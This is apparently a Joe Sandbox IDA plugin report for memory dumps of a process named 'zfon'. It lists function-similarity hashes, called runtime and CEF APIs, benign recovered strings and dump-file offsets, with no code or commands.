                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c0d964228e62662dd69238403e01b8c967a136a32bf0b3cf5687f910d97fee5f
                                                                                                • Instruction ID: 332da5c3fc48b521f5ada3fd4bc226fb4bd269ba3e1193b3f3fa749e3233fc27
                                                                                                • Opcode Fuzzy Hash: c0d964228e62662dd69238403e01b8c967a136a32bf0b3cf5687f910d97fee5f
                                                                                                • Instruction Fuzzy Hash: 6CE18032A19B8189EB50DF24E8803EDB7B4FB48788F444535DA8D07BA9DF38E554CB60
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID: document.body.scrollLeft = $document.body.scrollTop =
                                                                                                • API String ID: 3041573648-1848242717
                                                                                                • Opcode ID: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                • Instruction ID: b21d7dd2a1e357c35ce4a31ec169d37b99db0d33232537822fd00b4a9eda8a9c
                                                                                                • Opcode Fuzzy Hash: 063d5a371850d943b3a793401029a2b591f2405daa0d756e103ce80683033bc1
                                                                                                • Instruction Fuzzy Hash: 4471B432A09B8685EB50EF25D8503AEA771FB85B88F841131EA6D07AEDDF3CD445C750
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B911291B
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9112953
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B9112A66
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                  • Part of subcall function 00007FF8B910FD2C: _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FD76
                                                                                                  • Part of subcall function 00007FF8B910FD2C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FD93
                                                                                                  • Part of subcall function 00007FF8B910FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FDC9
                                                                                                  • Part of subcall function 00007FF8B910FD2C: _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FDF4
                                                                                                  • Part of subcall function 00007FF8B910FD2C: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE11
                                                                                                  • Part of subcall function 00007FF8B910FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE3A
                                                                                                  • Part of subcall function 00007FF8B910FD2C: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE72
                                                                                                  • Part of subcall function 00007FF8B910F930: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B910F93B
                                                                                                  • Part of subcall function 00007FF8B910F930: __crtGetLocaleInfoEx.LIBCPMT ref: 00007FF8B910F955
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: calloc$___lc_locale_name_funcfree$Concurrency::cancel_current_taskExceptionGetdaysGetmonthsInfoLocaleThrow___lc_codepage_func___mb_cur_max_func__crt__pctype_funclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                • API String ID: 3654265320-3573081731
                                                                                                • Opcode ID: 28510fcd3dd80bfbc3f2cddd89eae482c9dfe277f943031db850fde30aaa92f3
                                                                                                • Instruction ID: c38cbe8f1527e4da1af9d1aefffa7a68da06347755ae3902fcc26a8f3ae17fa3
                                                                                                • Opcode Fuzzy Hash: 28510fcd3dd80bfbc3f2cddd89eae482c9dfe277f943031db850fde30aaa92f3
                                                                                                • Instruction Fuzzy Hash: 5C51CE32A08BE596E724CF28945046E7BA0FB45BE4B144635CFA9437A4EB3DE482D700
                                                                                                APIs
                                                                                                • ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140 ref: 00007FF7F96EBF9C
                                                                                                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7F96EBFE7
                                                                                                • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z.MSVCP140 ref: 00007FF7F96EC00D
                                                                                                • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140 ref: 00007FF7F96EC02E
                                                                                                • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF7F96EC07B
                                                                                                • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7F96EC082
                                                                                                • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7F96EC08F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
                                                                                                • String ID:
                                                                                                • API String ID: 1492985063-0
                                                                                                • Opcode ID: 583b6c5399d8927dd0e9d876002cb2be730c77e550f060ad08d45f6894265d7a
                                                                                                • Instruction ID: 8b0fc48703e3ed6be15d7216c2eaef47133342757639f008aab53c87e68dc01e
                                                                                                • Opcode Fuzzy Hash: 583b6c5399d8927dd0e9d876002cb2be730c77e550f060ad08d45f6894265d7a
                                                                                                • Instruction Fuzzy Hash: 9D515822A0864181EB60AF1AE994238E771FB84FE5F54C231CE6E436E4CF3FD8468755
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: {for
                                                                                                • API String ID: 2943138195-864106941
                                                                                                • Opcode ID: 843ce90981090cc763d5b819b1a82c1911c4347c90cb61675e3ef59b1b7081ca
                                                                                                • Instruction ID: f02c59968a2779d788eaf411900ae92ce858e41001763b273bfdeb92ba80f601
                                                                                                • Opcode Fuzzy Hash: 843ce90981090cc763d5b819b1a82c1911c4347c90cb61675e3ef59b1b7081ca
                                                                                                • Instruction Fuzzy Hash: DC512772A08A85ADF7019FA8D4603E877A1FB44788F848032EB4D4BB99DF7CE655C340
                                                                                                APIs
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2418
                                                                                                • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2426
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2438
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F246C
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2476
                                                                                                • memset.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2484
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF8B90F2A30,?,?,00000000,00007FF8B90F5826), ref: 00007FF8B90F2494
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$memset$_invalid_parameter_noinfo_noreturn
                                                                                                • String ID:
                                                                                                • API String ID: 700262077-0
                                                                                                • Opcode ID: ab1676f4613d5929e73ddd5a5e1497729e0513e29030f9efa34d5d2f2fe8c048
                                                                                                • Instruction ID: f10bf4a2ab04adac49f36630ede59b4eed1cb6fe0fbf90970d39f9ece3d57fc9
                                                                                                • Opcode Fuzzy Hash: ab1676f4613d5929e73ddd5a5e1497729e0513e29030f9efa34d5d2f2fe8c048
                                                                                                • Instruction Fuzzy Hash: 5241CF62708A8191EE04EF1AE5442AE7356FB44BE0F544631EB6D0BBD9DFBCE146C304
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: NameName::atol
                                                                                                • String ID: `template-parameter$void
                                                                                                • API String ID: 2130343216-4057429177
                                                                                                • Opcode ID: 37dc88686286ae883caf861cfcc370a32d0b887e3358d6a576a3fa5485c4a12c
                                                                                                • Instruction ID: 35896fabf8f9aea46463763665a8f8aeb997f322552d61ee3e59f7cb2f000c73
                                                                                                • Opcode Fuzzy Hash: 37dc88686286ae883caf861cfcc370a32d0b887e3358d6a576a3fa5485c4a12c
                                                                                                • Instruction Fuzzy Hash: EF412422B08B56A8FB009BE8D8612AC73B1BF58BC8F981135DF0D26A59DF7CE545C340
                                                                                                APIs
                                                                                                • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96E4350), ref: 00007FF7F96E4191
                                                                                                • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96E4350), ref: 00007FF7F96E41B8
                                                                                                • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96E4350), ref: 00007FF7F96E41FD
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F96E4350), ref: 00007FF7F96E425B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Xout_of_range@std@@$Xlength_error@std@@memcpy
                                                                                                • String ID: invalid string position$string too long
                                                                                                • API String ID: 3790025958-4289949731
                                                                                                • Opcode ID: a433279aa140c95842c378e63d78108e93d20c681d0bed4b7112ca1e36f64c80
                                                                                                • Instruction ID: eceb51740616e14253b67f79263065c3838654f52aa6c91186754fb60cc6489c
                                                                                                • Opcode Fuzzy Hash: a433279aa140c95842c378e63d78108e93d20c681d0bed4b7112ca1e36f64c80
                                                                                                • Instruction Fuzzy Hash: 70318031A18B0281EB14FF25E988079B272FB94BD4B904531CA2D476ECDF3EE46183E5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+Replicator::operator[]
                                                                                                • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                • API String ID: 1405650943-2211150622
                                                                                                • Opcode ID: bbc19fe8acb2af624d1aa6c3fda2c2c3f4ee9ad2dfe93a969b1fef282e9c5a3b
                                                                                                • Instruction ID: 4c1cdd2ece87175a10374ff9aec53438316d6778dbd08b89cfac271e62e23f7a
                                                                                                • Opcode Fuzzy Hash: bbc19fe8acb2af624d1aa6c3fda2c2c3f4ee9ad2dfe93a969b1fef282e9c5a3b
                                                                                                • Instruction Fuzzy Hash: 2A4106B2E08B46ADF7118BACD8602BCB7A1BB08788F984931DB4C167A4DF7CE544C740
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: char $int $long $short $unsigned
                                                                                                • API String ID: 2943138195-3894466517
                                                                                                • Opcode ID: d543906abe76930c5ae4e84494e2eda85b894ff74c2d28b68c5523291a1a48d2
                                                                                                • Instruction ID: fef3c30fa1e94eeed08bfc1d75c2466910526d5e808eaee25e41f75c23eea019
                                                                                                • Opcode Fuzzy Hash: d543906abe76930c5ae4e84494e2eda85b894ff74c2d28b68c5523291a1a48d2
                                                                                                • Instruction Fuzzy Hash: 66311872B18A559DEB159FACD8601BC77A4FB09B88F448136DB4C27B98DE3CE544C710
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: b907666272c45d9d6ff080cd8075b49ea0bc4e31f06a12cac75e2cf208154752
                                                                                                • Instruction ID: 5cf5bf708bc17c66b19be321a88a27ddae350fd7e883f3471fbbe9fcdef8d512
                                                                                                • Opcode Fuzzy Hash: b907666272c45d9d6ff080cd8075b49ea0bc4e31f06a12cac75e2cf208154752
                                                                                                • Instruction Fuzzy Hash: 2EF01412A1858991EB90FF64CC521FE5A31AB58744FC41E31E62D450EB9F18D55683B1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 67324ca78e9feae9fa31f44ee5c65d68ce8e15fd10505976dea262e3b35507a2
                                                                                                • Instruction ID: a97b73e38923a6e1a596298fb3437f64756dd24619be371b58aac92a828af398
                                                                                                • Opcode Fuzzy Hash: 67324ca78e9feae9fa31f44ee5c65d68ce8e15fd10505976dea262e3b35507a2
                                                                                                • Instruction Fuzzy Hash: 25F07A61A14947D2EF48AF20FD586B86770FB98B6AF842031C51E450B8DE2CD58EC3B0
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96F8B20: new.LIBCMT ref: 00007FF7F96F8B37
                                                                                                  • Part of subcall function 00007FF7F96F8B20: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F8B46
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F34F4
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F3694
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F3860
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F3870
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F3880
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F388D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3856544966-0
                                                                                                • Opcode ID: 9e3e71ca329b96e36f7a132528e32e6390a8668cd25f0c4461edf89f4c602a05
                                                                                                • Instruction ID: 9f3b43137d64124a1de2a4ee150ff6f39629897d4d81bf0d2237c9fd91a83483
                                                                                                • Opcode Fuzzy Hash: 9e3e71ca329b96e36f7a132528e32e6390a8668cd25f0c4461edf89f4c602a05
                                                                                                • Instruction Fuzzy Hash: E9025B62A19B8595EB54EF15D8407ADA7B2FB84BC8F845035DA6D0B7E8EF3CD440C390
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
